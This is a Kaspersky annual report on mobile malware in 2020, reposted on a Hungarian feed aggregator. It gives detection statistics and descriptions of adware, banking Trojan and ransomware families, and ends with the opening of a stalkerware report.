Kaspersky

Subscribe to Kaspersky hírcsatorna Kaspersky
Frissítve: 2 óra 59 perc
2021. március 1.

Mobile malware evolution 2020

These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data.

The year in figures

In 2020, Kaspersky mobile products and technologies detected:

  • 5,683,694 malicious installation packages,
  • 156,710 new mobile banking Trojans,
  • 20,708 new mobile ransomware Trojans.
Trends of the year

In their campaigns to infect mobile devices, cybercriminals always resort to social engineering tools, the most common of these passing a malicious application off as another, popular and desirable one. All they need to do is correctly identify the application, or at least, the type of applications, that are currently in demand. Therefore, attackers constantly monitor the situation in the world, collecting the most interesting topics for potential victims, and then use these for infection or cheating users out of their money. It just so happened that the year 2020 gave hackers a large number of powerful news topics, with the COVID-19 pandemic as the biggest of these.

Pandemic theme in mobile threats

The word “covid” in various combinations was typically used in the names of packages hiding spyware and banking Trojans, adware or Trojan droppers. Names we encountered included covid.apk, covidMapv8.1.7.apk, tousanticovid.apk, covidMappia_v1.0.3.apk and coviddetect.apk. These apps were placed on malicious websites, hyperlinks were distributed through spam, etc.

The mobile malware Trojan-Ransom.AndroidOS.Agent.aq often hid behind another popular term, “corona”. Here are a few names of malicious files: ir.corona.viruss.apk, coronalocker.zip, com.coronavirus.inf.apk, coronaalert.apk, corona.apk, corona-virusapps.com.zip, com.coronavirus.map.1.1.apk, coronavirus.china.

Of course, this was not limited to naming: the pandemic theme was also used in application user interfaces. For example, the GINP banking Trojan pretended to be an app that searched for COVID-19-infected individuals: the victim was coaxed into providing their bank card details under the pretext of a €0.75 fee charge.

The creators of another banking Trojan, Cebruser, simply named it “Coronavirus”, probably to echo the disturbing news coming from all over the world and to make some money along the way. As in the previous case, the attackers were after the bank card details and the owner’s personal information.

They came up with nothing new in terms of technique. So-called “web injectors”, which had been perfected for years, were used in both cases. When certain events are detected, the banking Trojan opens a window that displays a web page with a request for bank card details. The page can have any type of design: we have seen a request from a large bank in one case and a message about a search for COVID-19-infected individuals in another. The flexibility allows attackers to efficiently manipulate potential victims, adapting attacks to the situation both on a particular device and in the world at large.

We could conclude that the pandemic as a global phenomenon had a major effect on the mobile threat landscape, but to be true to facts, this is not entirely the case. If you look at the dynamics of attacks on mobile users in 2020, you will see that the average monthly number of attacks decreased by 865,000 compared to 2019. That number seems large, but it is only about 1.07% of total attacks, so we cannot call it a significant decrease.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of attacks on mobile users in 2019 and 2020 (download)

Besides, we have seen a decrease in attacks in the first half of 2020, which can be attributed to the confusion of the first months of the pandemic: hackers had other things to worry about. However, in the second half of the year, when the situation became calmer and more predictable despite lockdowns in a number of countries, we saw a clear increase in attacks.

In addition, our telemetry has shown significant growth in mobile financial threats in 2020. More on that later.

Adware

Last year was notable for both malware and adware, the two very close in terms of capabilities. Typically, code that runs ads was embedded in a carrier application, e.g. a mobile game or torch, as long as it was popular enough. After the application ran, it could follow one of several scenarios, depending on its creator’s greed and the advertising module’s capabilities. If the user was lucky, they saw an advertising banner at the bottom of the carrier application window, and if not, the advertising module subscribed to USER_PRESENT (device unlock) events, using a SYSTEM_ALERT_WINDOW window for displaying full-screen banners at random intervals.


Ad window (left) and carrier app definition (right)

In the latter case, the problem was not just the size of the banner, but also difficulty identifying the application that it was coming from. There were usually no technical obstacles to removing this application, and with it, the ads. We had recorded apps featuring aggressive advertising appearing in Google Play before, but 2020 proved rich in this kind of cases.

In terms of the number of attacks on mobile users, the situation around various advertising modules and applications looked more or less stable. This is probably one of the few classes of threats where the number of attacks hardly changed in 2020 as compared to the previous year.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of adware attacks on mobile users in 2019 and 2020 (download)

The number of unique users attacked by adware decreased slightly compared to 2019.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Users attacked by adware in 2018 through 2020 (download)

Interestingly enough, the share of adware attacks increased in relation to mobile malware in general. Whereas it was 12.85% in 2019, it reached 14.62% in 2020.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of attacks by type of software used in 2020 (download)

Adware creators are interested in obstructing the removal of their products from a mobile device. They typically work with malware developers to achieve this. An example of a partnership like that is the use of various trojan botnets: we saw a number of these cases in 2020.

The pattern is quite simple. The bot infects a mobile device and waits for a command, usually trying to avoid the victim’s attention. As soon as the owners of the botnet and their customers come to an agreement, the bot receives a command to download, install and run a payload, in this case, adware. If the victim is annoyed by the unsolicited advertising and removes the source, the bot will simply repeat the steps. In addition, trojans have been known to elevate access privileges on the device, placing adware in the system area and making the user unable to remove them without outside help.

Another example of the partnership is so-called preinstall. The manufacturer of the mobile device preloads an adware application or a component with the firmware. As a result, the device hits the shelves already infected. This is not a supply chain attack, but a premeditated step on the part of the manufacturer for which it receives extra profits. To add to that, no security solution is yet capable of reading an OS system partition to check if the device is infected. Even if detection is successful, the user is left alone with the threat, without a possibility of removing the malware quickly or easily, as Android system partitions are write protected. This vector of spreading persistent threats is likely to become increasingly popular in the absence of new effective exploits for popular Android versions.

Attacks on personal data

Almost any of the personal data stored on our smartphones can be monetized. In particular, advertisers can display targeted offerings, and attackers can access accounts with various services, such as online banking. It is thus small wonder that data is hunted: sometimes openly and sometimes illegally.

Ever since Android has introduced Accessibility Services, which provide applications with access to settings and other programs, the number of malware tools that extract confidential data from mobile devices has been on the rise. The Trojan Ghimob was one of 2020’s most exciting discoveries. It stole credentials for various financial systems including online banking applications and cryptocurrency wallets in Brazil. Ghimob used Accessibility for both extracting valuable data from application windows and interacting with the operating system. Whenever the user tried to access the Ghimob removal menu, the Trojan immediately opened the home screen to protect itself from being uninstalled.

Another exciting discovery was the Cookiethief Trojan. As the name implies, the malware targeted cookies, which store unique identifiers of web sessions and hence can be used for authorization. For example, an attacker could log in to a victim’s Facebook account and post a phishing link or spread spam. Typically, cookies on a mobile device are stored in a secure location and are inaccessible to applications, even malicious ones. To circumvent the restriction, Cookiethief tried to get root privileges on the device with the help of an exploit, before it began its malicious activities.

Apple iOS

According to various sources, the proportion of Android-powered devices in relation to all mobile devices ranges from 50% to 85% depending on the region. Apple’s iOS naturally comes second. So, what were the threats to that system in 2020? According to the Zerodium, exchange, the price of an iOS exploit chain is quite impressive, albeit lower than that for Android: $2,000,000 against $2,500,000. We are not aware of the Zerodium pricing mechanics, but the information suggests that attacks on Apple devices are a very popular commodity. Effective infection is only feasible though a drive-by download.

In 2020, our colleagues at TrendMicro detected the use of Apple WebKit exploits for remote code execution (RCE) in conjunction with Local Privilege Escalation exploits to deliver malware to an iOS device. The payload was the LightSpy Trojan whose objective was to extract personal information from a mobile device, including correspondence from instant messaging apps and browser data, take screenshots, and compile a list of nearby Wi-Fi networks. The Trojan was a modular design, with its individual components receiving updates. One of the modules discovered was a network scanner that collected information about nearby devices including their MAC addresses and manufacturer names. TrendMicro said LightSpy distribution took advantage of news portals, such as COVID-19 update sites.

Statistics Number of installation packages

We discovered 5,683,694 mobile malicious installation packages in 2020, which was 2,100,000 more than in 2019.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Mobile malicious installation packages for Android in 2017 through 2020 (download)

The year 2020 can be said to have broken an established downward trend in the number of mobile threats discovered. There were not any special factors driving that, though.

Number of mobile users attacked

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Mobile users attacked in 2019 and 2020 (download)

The number of users attacked steadily decreased over the past year. The number of users encountering mobile threats in 2020 was on the average a quarter lower than that in 2019.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of mobile threats in 2020 (download)

Top 10 countries by share of users attacked by mobile malware

Country* %** Iran 67.78 Algeria 31.29 Bangladesh 26.18 Morocco 22.67 Nigeria 22.00 Saudi Arabia 21.75 India 20.69 Malaysia 19.68 Kenya 18.52 Indonesia 17.88

* Excluded from the rankings are countries with fewer than 25,000 active users of Kaspersky mobile security solutions in the reporting period.
** Users attacked in the country as a percentage of all users of Kaspersky Security for Mobile in the country.

Iran (67.78%) led by number of attacked users, mainly due to an aggressive spread of the AdWare.AndroidOS.Notifyer family. An alternative Telegram client, which we detect as RiskTool.AndroidOS.FakGram.d, acted as another widespread threat. This is not malware per se, but messages sent though the app can go to unintended recipients. A frequently detected malicious program was Trojan.AndroidOS.Hiddapp.bn whose objective was to download adware to an infected device.

Algeria ranked second with 31.29%. The AdWare.AndroidOS.FakeAdBlocker and AdWare.AndroidOS.HiddenAd families were the most widespread ones in that country. Two of the most widespread malicious programs were Trojan-Dropper.AndroidOS.Agent.ok and Trojan.AndroidOS.Agent.sr.

Rounding out the “top three” was Bangladesh with 26.18%, where the FakeAdBlocker and HiddenAd adware families were also the most widespread ones.

Types of mobile threats

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of new mobile threats by type in 2019 and 2020 (download)

Twelve of twenty-two types of mobile threats showed an increase in the number of detected installation packages in 2020, with the most significant growth demonstrated by adware: from 21.81% to 57.26%. In absolute terms, the number of packages more than quadrupled: 3,254,387 in 2020 against 764,265 в 2019. Unsurprisingly, the share of the former leader, RiskTool, dropped from 32.46% to 21.34%. Third place, as in 2019, was occupied by malware, such as Trojan-Dropper (4.51%) whose share also decreased markedly, by 11.58 p.p.

Adware

The vast majority (almost 65%) of adware discovered in 2020 belonged to the Ewind family. The most common member of that family was AdWare.AndroidOS.Ewind.kp, with more than 2,100,000 installation packages.

Top 10 adware families discovered in 2020

Name of family %* Ewind 64.93 FakeAdBlocker 15.27 HiddenAd 10.09 Inoco 2.16 Agent 1.12 Dnotua 0.84 MobiDash 0.69 SplashAd 0.66 Vuad 0.64 Dowgin 0.47

* Share of the adware family in the total number of adware packages

The Ewind family is an example of aggressive adware. Its members try to monitor the user’s activities and counteract attempts at removal. In particular, the aforementioned Ewind.kp variant displays an error message upon starting.


AdWare.AndroidOS.Ewind.kp screenshot

As soon as the user taps OK, the app window will close and its icon will be hidden from the home screen. After that, the Ewind.kp will monitor the user’s activity and display advertising windows at certain points. In addition to banners in the notification bar, the app will open promoted sites, such as online casinos, in a separate browser window.


Advertising banner (left) and open Ewind.kp browser window with a promoted website (right)

Where did the more than two million Ewind.kp packages come from? Its creators exploit the content of legitimate applications, such as icons and resource files. Resulting packages seldom do anything useful, but Ewind applications created with others’ content could fill up a fake app marketplace. They all have diverse names, icons and installation package sizes, so an unsophisticated user might not even suspect anything is amiss about the store.

The best part of it is that the AdWare.AndroidOS.Ewind.kp variant has been known since 2018, and we have never once had to adjust the process of detecting it in almost three years. Individuals who generate that many installation packages are obviously not worried about antivirus software.

RiskTool

RiskTool-class applications remained one of the three most relevant threats even without showing a significant growth in 2020. Their share declined in relation to others, but in absolute terms, the threats in that class even gained relevance. The major contributing factor was the SMSReg family, which doubled in number to 424,776 applications compared to 2019.

Top 10 RiskTool families discovered in 2020

Name of family %* SMSreg 41.75 Robtes 16.13 Agent 9.67 Dnotua 7.72 Resharer 7.50 Skymobi 5.29 Wapron 3.42 SmsPay 2.78 PornVideo 1.41 Paccy 0.76

* Share of the RiskTool family in the total number of RiskTool packages

Other threats

The number of backdoors detected almost tripled from 28,889 in 2019 to 84,495 in 2020. However, most of the detected threats notably belonged to older families whose relevance was questionable. Where did these come from? Many members of these families became publicly available, serving as test subjects: for instance, their code was obfuscated to test the antivirus engine’s detection quality. This does not make a whole lot of sense, as obfuscation is only effective against engines with very limited capabilities. More importantly, however, the legality of these activities is doubtful: lab tests on malware code are acceptable, but publication of samples is ethically questionable at the very least.

The number of detected Android exploits increased seventeenfold. LPE exploits, relevant to Android versions 4 through 7, accounted for most of the growth. As for exploits for more recent versions of that OS, they are typically device specific.

The number of Trojan-Proxy threats has increased by twelve times. This type of malware is used by hackers for establishing secure tunnels which they can then use as they see fit. A major threat to the victims is the use of their mobile devices as a mediator in criminal offenses, e.g. downloading of child pornography. This may result in law enforcement agencies taking an interest in the owner of the infected device and asking them questions they would rather avoid. For companies, a secure tunnel between an infected corporate smartphone and an unknown attacker means unauthorized third-party access to internal infrastructure, which, to put it mildly, is undesirable.

Top 20 mobile malware programs

The following malware rankings omit riskware, such as RiskTool and AdWare.

Verdict %* 1 DangerousObject.Multi.Generic 36.95 2 Trojan.AndroidOS.Boogr.gsh 9.54 3 DangerousObject.AndroidOS.GenericML 6.63 4 Trojan-Downloader.AndroidOS.Necro.d 4.08 5 Trojan-Dropper.AndroidOS.Hqwar.cf 4.02 6 Trojan-SMS.AndroidOS.Agent.ado 4.02 7 Trojan.AndroidOS.Hiddad.fi 2.64 8 Trojan.AndroidOS.Agent.vz 2.60 9 Trojan-Downloader.AndroidOS.Helper.a 2.51 10 Trojan.AndroidOS.Handda.san 1.96 11 Trojan-Downloader.AndroidOS.Agent.ic 1.80 12 Trojan-Downloader.AndroidOS.Agent.hy 1.67 13 Trojan.AndroidOS.MobOk.v 1.60 14 Trojan.AndroidOS.LockScreen.ar 1.49 15 Trojan.AndroidOS.Piom.agcb 1.49 16 Trojan.AndroidOS.Hiddapp.ch 1.46 17 Exploit.AndroidOS.Lotoor.be 1.39 18 Trojan-Dropper.AndroidOS.Hqwar.gen 1.34 19 Trojan.AndroidOS.Necro.a 1.29 20 Trojan-Dropper.AndroidOS.Agent.rb 1.26

* Share of users attacked by this type of malware in total attacked users

The leaders among the twenty most widespread malicious mobile applications were unchanged from 2019, with only their shares changing slightly. The leader was DangerousObject.Multi.Generic (36.95%), the verdict we use for malware detected by using cloud technology. The verdict is applied where the antivirus databases still lack the signatures or heuristics for detection. The most recent malware is detected that way.

The Trojan.AndroidOS.Boogr.gsh verdict ranked second with 9.54%. It is assigned to files recognized as malicious by our ML-powered system. Another result of this system’s work is objects with the verdict DangerousObject.AndroidOS.GenericML (6.63%, ranking third). The verdict is assigned to files whose structure bears a strong similarity to previously known ones.

Trojan-Downloader.AndroidOS.Necro.d (4.08%) ranked fourth. Unlike other malicious programs in that family, which are installation packages, the Necro.d variant is a native ELF executable. We typically detected that Trojan in the read-only system area. It could only make its way there via another Trojan that exploited system privileges or as part of the firmware. Necro.d apparently used the latter path, as one of its capabilities is uploading KINGROOT, a package used for elevation of privileges. Necro.d’s mission is to download, install and run other apps when instructed by attackers. In addition, it provides remote access to the shell of the infected device.

The Hqwar dropper ranked fifth and eighteenth simultaneously. This malicious “phoenix” seems to be rising from the ashes, with 39,000 users showing that they were infected in 2020 compared to 28,000 in 2019. Hqwar in a nutshell:

  • This is a nesting-doll malicious program that has an external dropper shell next to an obfuscated DEX executable payload.
  • Its main objective is evading detection by the antivirus engine if the device has a security solution installed.
  • Banking Trojans typically serve as the payload.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of users attacked by Hqwar droppers in 2019 and 2020 (download)

In most cases, banking Trojans unloaded by Hqwar were focused on targets in Russia, specifically, applications operated by Russian financial institutions.

Top 10 countries by number of users attacked by Hqwar

Country Share of attacked users 1 Russia 305861 2 Turkey 22138 3 Spain 15160 4 Italy 8314 5 Germany 3659 6 Poland 3072 7 Egypt 2938 8 Australia 2465 9 Great Britain 1446 10 USA 1351

Trojan-SMS.AndroidOS.ado(4.02%) ranked sixth in the TOP 20 list of mobile malicious programs. This is a typical example of the kind of old-school text-message scams that were popular in 2011 and 2012. Their enduring relevance is a surprise. The Trojan targets Russian-speaking audiences, as Russia is a country with a mature market for buying content by sending text messages to paid phone numbers. This is a modern design, though: the Trojan uses an obfuscator as protection against reverse engineering and detection, and receives commands from external operators. Agent.ado is distributed under the guise of an app installer.

Trojan.AndroidOS.Hiddad.fi (2.64%) ranked seventh. This Trojan handles installation of adware in an infected system, but it can display ads as well.

Trojan.AndroidOS.Vz (2.60%) ranked eighth, a malicious module loaded by other Trojans including members of the Necro family. It serves as an intermediate link in the infection chain, and it is responsible for downloading further modules, for instance, Ewind adware, mentioned above.

Trojan-Downloader.AndroidOS.Helper.a (2.51%) ranked ninth. It exemplifies occasional difficulty removing mobile malware from the system. Helper is part of a chain that includes Trojans elevating their access rights on the device and writing themselves or Helper to the system area. In addition to that, the Trojans make changes to the factory reset process, leaving the user few chances to get rid of the malware without outside help. The approach is nothing new, but we saw plenty of users complaining on the Internet about the difficulty they were having removing Helper, something we had not seen before.

Trojan.AndroidOS.Handda.san (1.96%) rounds out the first ten This verdict is an umbrella for a whole group of malicious programs, which include trojans with shared capabilities: icon hiding, obtaining Device Admin rights and using packers to counteract detection.

Trojans in the Trojan-Downloader.AndroidOS.Agent family ranked eleventh and twelfth, their only objective being downloading a payload when instructed by the operators. In both cases, the payload is encrypted and traffic cannot be interpreted to indicate what exactly is being loaded onto the device.

Trojan.AndroidOS.MobOk.v (1,60%) ranked thirteenth. MobOk trojans can automatically subscribe a victim to paid services. They attempted to attack users in Russia more frequently than others in 2020.

The primitive Trojan.AndroidOS.LockScreen.ar Trojan (1,49%) ranked fourteenth. This malware was first spotted in 2017. Locking the device screen is its only mission.

Trojan.AndroidOS.Hiddapp.ch (1,46%) ranked sixteenth. We assign this verdict to any app that hides its icon in the list of apps immediately upon starting. Subsequent steps may vary, but these are typically downloading or dropping other apps, or displaying ads.

Exploit.AndroidOS.Lotoor.be (1,39%), a local exploit for elevating privileges to the superuser, ranked seventeenth. Its popularity should not be surprising, as this type of malware is capable of downloading Necro, Helper and other Trojans in our Top 20.

Trojan.AndroidOS.Necro.a (1,29%), which ranked nineteenth, is a chain of Trojans. It takes root in the system, and it sometimes proves difficult to remove, along with associated Trojans.

Rounding out our Top 20 is Trojan-Dropper.AndroidOS.Agent.rb (1,26%). It serves various groups, and objects it is used to pack include both malware and perfectly legitimate software. There are notably two variants: in the first case, the code for decrypting the payload is located in a native library loaded from the main DEX file, and in the second, the dropper code is concentrated within the body of the main DEX file.

Mobile banking trojans

We detected 156,710 installation packages for mobile banking Trojans in 2020, which is twice the previous year’s figure and comparable to 2018.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Mobile banking Trojan installation packages detected by Kaspersky in 2017 through 2020 (download)

Whereas the statistics for 2018 were seriously affected by an epidemic of the Asacub trojan, the major culprits last year were objects from the Trojan.AndroidOS.Agent family. That family’s share was just 19.06% in 2019, jumping to 72.79% in 2020.

Top 10 banking trojans discovered in 2020

Name of family %* Agent 72.79 Wroba 5.44 Rotexy 5.18 Anubis 2.88 Faketoken 2.48 Zitmo 2.16 Knobot 1.53 Gustuff 1.48 Cebruser 1.43 Asacub 1.07

* Share of the mobile banker trojan family in the total number of mobile banker trojan packages

Agent.eq was the most prolific of all Agent (72.79%) variants. The heuristics turned out to be universal, helping us detect malware belonging to Asacub, Wroba and other families.

The Korean malware Wroba, spread by its operators through smishing, in particular, by sending fake text messages from a logistics company, ranked second. Like many others of its kind, the malware shows the victim one of a number of preset phishing windows, depending on what financial app is running on the home screen.

The rest of the programs included in the rankings have been well known to researchers for a long time.  One exception might be Knobot (1.53%), a relatively new player that targets financial data. Along with phishing windows and interception of 2FA verification messages, the Trojan is equipped with several tools that are uncharacteristic of financial threats. An example of these is hijacking device PINs through exploitation of Accessibility Services. The hackers might need the PIN for manually controlling the device in real time.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Attacks by mobile banking trojans in 2019 and 2020 (download)

The surge in attacks in August 2020 is attributed to the Asacub, Agent and Rotexy families. It is through their escalating spread that the stable picture observed up until July was changed.

Top 10 families of mobile bankers

Family %* Asacub 25.63 Agent 17.97 Rotexy 17.92 Svpeng 12.81 Anubis 12.36 Faketoken 10.97 Hqwar 5.59 Cebruser 2.52 Gugi 1.45 Knobot 1.08

* Share of users attacked by the family of mobile bankers in total users attacked by mobile banking Trojans

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of mobile bankers attacks in 2020 (download)

Top 10 countries by share of users attacked by mobile bankers

Country* %** 1 Japan 2.83 2 Taiwan Province, China 0.87 3 Spain 0.77 4 Italy 0.71 5 Turkey 0.60 6 South Korea 0.34 7 Russia 0.25 8 Tajikistan 0.21 9 Poland 0.17 10 Australia 0.15

* Excluded from the rankings are countries with fewer than 25,000 active users of Kaspersky mobile solutions in the reporting period.
** Unique users attacked by mobile bankers in the country as a percentage of all users of Kaspersky mobile solutions in the country.

Compared to 2019, the distribution of countries by number of users attacked by mobile bankers changed significantly. Russia (0.25%), which had ranked first for three years, dropped to seventh place. Japan (2.83%), where the aforementioned Wroba raged, ranked first. The situation was similar in Taiwan (0.87%), which ranked second in our Top 10. Third was Spain (0.77%), where the most popular bankers were Cebruser and Ginp.

Italy (0.71%) ranked fourth. The most common threats in that country were Cebruser and Knobot. In Turkey (0.60%), ranked fifth, users of Kaspersky security solutions most often encountered the Cebruser and Anubis families.

The most widespread banking trojan in Russia (0.25%) was Trojan-Banker.AndroidOS.Rotexy.e, followed by Svpeng.q and Asacub.snt.

Mobile ransomware Trojans

We found 20,708 installation packages for ransomware Trojans in 2020, a decrease of 3.5 times on the previous year.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Ransomware Trojan installation packages in 2018 through 2020 (download)

Overall, the decrease in ransomware can be associated with the assumption that attackers have been converting from ransomware to bankers or combining the features of the two. Current versions of Android prevent applications from locking the screen, so even successful ransomware infection is useless.

However, in the field of mobile ransomware, we were in for a nasty surprise.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Users attacked by mobile ransomware Trojans in 2019 and 2020 (download)

Whereas the beginning of 2020 saw a decrease in the number of users attacked by ransomware trojans, we observed a spike in September, with the indicator then returning to July’s figures.

Looking closer, we found out that Trojan-Ransom.Win32.Encoder.jya was the most widespread type of ransomware in September. As the verdict shows, the malware is not designed for the Android platform — it is an encryptor that targets files on Windows workstations. How did that end up on mobile devices? The explanation is simple: September saw Encoder.jya spread via Telegram, while the instant messaging app has both a mobile and desktop client. The attackers clearly targeted Windows users, while mobile users received the malware, one might say, accidentally, due to the mobile version of Telegram syncing downloads with the desktop client. Once in the smartphone memory, the malware was successfully detected by Kaspersky security solutions. A file containing Encoder.jya was most often named as 2-5368451284523288935.rar or AIDS NT.rar.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of mobile ransomware attacks in 2020 (download)

Top 10 countries by share of users attacked by ransomware Trojans

Country* %** USA 2.25 Kazakhstan 0.77 Iran 0.35 China 0.21 Italy 0.14 Canada 0.11 Mexico 0.09 Saudi Arabia 0.08 Australia 0.08 Great Britain 0.07

* Excluded from the rankings are countries with fewer than 25,000 active users of Kaspersky mobile solutions in the reporting period.
** Unique users attacked by mobile ransomware in the country as a percentage of all users of Kaspersky mobile solutions in the country.

As in 2019, the United States was the country with the most attacked users (2.25%) in 2020. The most common family of mobile ransomware in the country was Svpeng. Kazakhstan (0.77%) ranked second again, Rkor being the most widespread ransomware in that country. Iran (0.35%) remained in third position in our Top 10. The most common type of mobile ransomware there was Trojan-Ransom.AndroidOS.Small.n.

Conclusion

The 2020 pandemic has affected every aspect of our lives, and the landscape of mobile threats has been no exception. We saw a decrease in the number of attacks in the first half of the year, which can be attributed to the confusion of the first months of the pandemic: the attackers had other things to worry about. They were back at it in the second half, though, and we saw an increase in attacks involving mobile bankers, such as Asacub and Wroba. Besides that, we saw stronger interest in banking data, both from criminal groups specializing in mass infections and from those who prefer to select their targets carefully. And this, too, was affected by the pandemic: the inability to visit a bank branch forced customers to switch to mobile and online banking, and banks, to consider stepping up the development of those services.

Another statistically interesting event was an increase in adware, with the Ewind family making a major contribution to this: we discovered more than 2,000,000 packages of the Ewind.kp variant alone. However, these volumes had little, if any, impact on attack statistics. Coupled with Ewind.kp developers’ reluctance to make changes to the core application code, this may indicate that they have opted for quantity over quality.

2021. február 26.

The state of stalkerware in 2020

 The state of stalkerware in 2020 (PDF)

Main findings

Kaspersky’s data shows that the scale of the stalkerware issue has not improved much in 2020 compared to the last year:

  • The number of people affected is still high. In total, 53,870 of our mobile users were affected globally by stalkerware in 2020. Keeping in mind the big picture, these numbers only include Kaspersky users, and the total global numbers will be higher. Some affected users may use another cybersecurity solution on their devices, while some do not use any solution at all.
  • With more than 8,100 users affected globally, Nidb is the most used stalkerware sample, according to our 2020 stats. This sample is used to sell a number of different stalkerware products such as iSpyoo, TheTruthSpy and Copy9 among others.
  • In terms of geographic spread, we see a largely consistent trend emerging: Russia, Brazil, and the United States of America (USA) remain the most affected countries globally, and they are the three leading countries in 2020.
  • In Europe, Germany, Italy and the United Kingdom (UK) are the top three most-affected countries respectively.
Introduction and methodology

Technology has enabled people to connect more than ever before. We can choose to digitally share our lives with our partner, family, and friends regardless of how far we are physically. Yet, we are also seeing a rise in software that enables users to remotely spy on another person’s life via their digital device, without the affected user giving their consent or being notified.

The software, known as stalkerware, is commercially available to everyone with access to the internet. The risks of stalkerware can go beyond the online sphere and enter the physical world. The Coalition Against Stalkerware warns that stalkerware “may facilitate intimate partner surveillance, harassment, abuse, stalking, and/or violence.” Stalkerware can also operate in stealth mode, meaning that there is no icon displayed on the device to indicate its presence and it is not visible to the affected user. The majority of affected users do not even know this type of software exists. This means they cannot protect themselves, online or offline, especially as the perpetrator using stalkerware usually knows their victim personally.

In recent years, Kaspersky has been actively working with partners to end the use of stalkerware. In 2019, we created a special alert that notifies users if stalkerware is installed on their phones. Following that we became one of ten founding members of the Coalition Against Stalkerware. We also published our first full report on the state of stalkerware in the same year to understand the scale of the problem.

This report continues to examine the issue of stalkerware and presents new statistics from 2020, in comparison to our previous data. The data in this report has been taken from aggregated threat statistics obtained from the Kaspersky Security Network. The Kaspersky Security Network is dedicated to processing cybersecurity-related data streams from millions of voluntary participants around the world. All received data is anonymized. To calculate our statistics, we review the consumer line of Kaspersky’s mobile security solutions.

The issue of, and the story behind, stalkerware

